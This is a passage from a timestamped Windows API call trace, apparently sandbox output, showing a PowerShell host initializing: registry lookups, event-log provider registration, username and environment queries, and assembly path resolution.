(pv=0x1a3a10) [0079.424] CoTaskMemFree (pv=0x0) [0079.425] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x380) returned 0x0 [0079.425] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.425] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3a4) returned 0x0 [0079.425] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.425] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3a8) returned 0x0 [0079.425] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.425] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3ac) returned 0x0 [0079.425] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.426] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3b0) returned 0x0 [0079.426] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.426] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3b4) returned 0x0 [0079.426] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.426] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3b8) returned 0x0 [0079.426] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.426] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3bc) returned 0x0 [0079.427] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x0) returned 0x2 [0079.427] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3c0) returned 0x0 [0079.427] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccef8 | out: phkResult=0xccef8*=0x3c4) returned 0x0 [0079.427] RegCloseKey (hKey=0x3c4) returned 0x0 [0079.427] RegCloseKey (hKey=0x3a0) returned 0x0 [0079.427] RegCloseKey (hKey=0x3c0) returned 0x0 [0079.436] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9e0008 [0079.441] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d4ccf0*="WSMan", lpRawData=0x3d4ca60) returned 1 [0079.452] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.452] CoTaskMemFree (pv=0x1ef390) [0079.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.456] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.456] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.456] CoTaskMemFree (pv=0x1b8f3ac0) [0079.456] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.456] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.456] CoTaskMemFree (pv=0x1a3a10) [0079.457] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d52228*="Alias", lpRawData=0x3d51fb8) returned 1 [0079.459] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.459] CoTaskMemFree (pv=0x1ef390) [0079.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.462] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.462] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.462] CoTaskMemFree (pv=0x1b8f3ac0) [0079.462] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.462] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.463] CoTaskMemFree (pv=0x1a3a10) [0079.463] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d57820*="Environment", lpRawData=0x3d575b0) returned 1 [0079.465] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.465] CoTaskMemFree (pv=0x1ef390) [0079.467] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.467] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0079.467] CoTaskMemFree (pv=0x1ef390) [0079.467] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.467] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0079.467] CoTaskMemFree (pv=0x1ef390) [0079.467] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.467] SetErrorMode (uMode=0x1) returned 0x1 [0079.467] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.468] SetErrorMode (uMode=0x1) returned 0x1 [0079.469] GetLogicalDrives () returned 0x4 [0079.470] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccaa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.471] SetErrorMode (uMode=0x1) returned 0x1 [0079.472] CoTaskMemAlloc (cb=0x68) returned 0x1b8f02a0 [0079.472] CoTaskMemAlloc (cb=0x68) returned 0x1b8f03f0 [0079.472] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8f02a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xccf10, lpMaximumComponentLength=0xccf0c, lpFileSystemFlags=0xccf08, lpFileSystemNameBuffer=0x1b8f03f0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xccf10*=0x9c354b42, lpMaximumComponentLength=0xccf0c*=0xff, lpFileSystemFlags=0xccf08*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.473] CoTaskMemFree (pv=0x1b8f02a0) [0079.473] CoTaskMemFree (pv=0x1b8f03f0) [0079.473] SetErrorMode (uMode=0x1) returned 0x1 [0079.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.474] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.512] SetErrorMode (uMode=0x1) returned 0x1 [0079.512] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcceb0 | out: lpFileInformation=0xcceb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.512] SetErrorMode (uMode=0x1) returned 0x1 [0079.512] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.512] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.513] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.513] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.514] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.515] SetErrorMode (uMode=0x1) returned 0x1 [0079.515] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccce0 | out: lpFileInformation=0xccce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.515] SetErrorMode (uMode=0x1) returned 0x1 [0079.515] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.515] SetErrorMode (uMode=0x1) returned 0x1 [0079.515] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccce0 | out: lpFileInformation=0xccce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.515] SetErrorMode (uMode=0x1) returned 0x1 [0079.516] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.516] SetErrorMode (uMode=0x1) returned 0x1 [0079.516] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccd80 | out: lpFileInformation=0xccd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.516] SetErrorMode (uMode=0x1) returned 0x1 [0079.516] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.516] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.517] CoTaskMemFree (pv=0x1b8f3ac0) [0079.517] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.517] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.517] CoTaskMemFree (pv=0x1a3a10) [0079.518] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d5e910*="FileSystem", lpRawData=0x3d5e6a0) returned 1 [0079.519] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.519] CoTaskMemFree (pv=0x1ef390) [0079.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.522] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.522] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.522] CoTaskMemFree (pv=0x1b8f3ac0) [0079.522] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.522] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.522] CoTaskMemFree (pv=0x1a3a10) [0079.523] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d64150*="Function", lpRawData=0x3d63ee0) returned 1 [0079.528] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.528] CoTaskMemFree (pv=0x1ef390) [0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.701] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.701] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.701] CoTaskMemFree (pv=0x1b8f3ac0) [0079.701] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.701] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.701] CoTaskMemFree (pv=0x1a3a10) [0079.702] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3348a60*="Registry", lpRawData=0x33487f0) returned 1 [0079.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.705] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.705] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.706] CoTaskMemFree (pv=0x1b8f3ac0) [0079.706] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.706] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.706] CoTaskMemFree (pv=0x1a3a10) [0079.707] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x334de78*="Variable", lpRawData=0x334dc08) returned 1 [0079.709] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.709] CoTaskMemFree (pv=0x1ef390) [0079.712] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.712] CoTaskMemFree (pv=0x1ef390) [0079.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.781] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.781] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd188) returned 0x1 [0079.782] CoTaskMemFree (pv=0x1b8f3ac0) [0079.782] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.782] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd1c8) returned 1 [0079.782] 